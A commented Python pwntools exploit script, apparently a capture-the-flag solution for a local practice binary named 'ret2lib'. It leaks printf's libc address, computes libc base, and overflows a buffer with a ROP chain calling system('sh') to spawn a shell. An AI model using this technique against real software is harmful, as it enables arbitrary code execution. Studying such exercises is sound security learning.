#! /usr/bin/python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2018 howpwn <finn79426@gmail.com>
#
# Distributed under terms of the MIT license.

from pwn import * 

# Drive the local ./ret2lib binary: leak one libc address through the
# program's own "print the content of an address" feature, derive the
# libc base from it, then send an overlong message carrying a small
# return-oriented chain.  Everything below is Python 2 (pwntools strings
# are plain str here).
p = process("./ret2lib")

# First prompt.  The program reads an address from us and echoes back the
# value stored there; that echo is the information leak the rest of the
# script depends on.  0x601020 is labelled printf@plt by the author.
p.recvuntil(":")
p.sendline("601020")  # printf@plt

# The answer looks like "The content of the address : <hex>\n" followed by
# the next prompt "Leave some message for me :".  Read past the first
# prompt, then take only the hex value before the newline.
p.recvuntil(": ")
leak_line = p.recvuntil(":")
printf_addr = int(leak_line.split("\n")[0], 16)

# Values recovered with gdb / ROPgadget by the author.  They are only
# meaningful for the exact libc build and binary analysed; the absolute
# 0x40xxxx addresses suggest the main binary is not position-independent
# (NOTE(review): inferred from the constants, not verified here).
printf_offset = 0x55800  # gdb -> off
system_offset = 0x45390
gadget_pop_rdi = 0x0000000000400843  # Use ROPgadget
sh_string = 0x4003c4  # gdb -> find

# One leaked libc pointer plus its offset gives the base; from there every
# other libc symbol is base + offset.
libc_base_address = printf_addr - printf_offset
system_address = libc_base_address + system_offset

print("This is base")
print(libc_base_address)

# 280 bytes of filler reach the saved return address (size chosen by the
# author), followed by: pop rdi -> address in sh_string -> system().
padding = cyclic(280)
rop_chain = p64(gadget_pop_rdi) + p64(sh_string) + p64(system_address)
payload = padding + rop_chain

p.sendline(payload)

p.interactive()

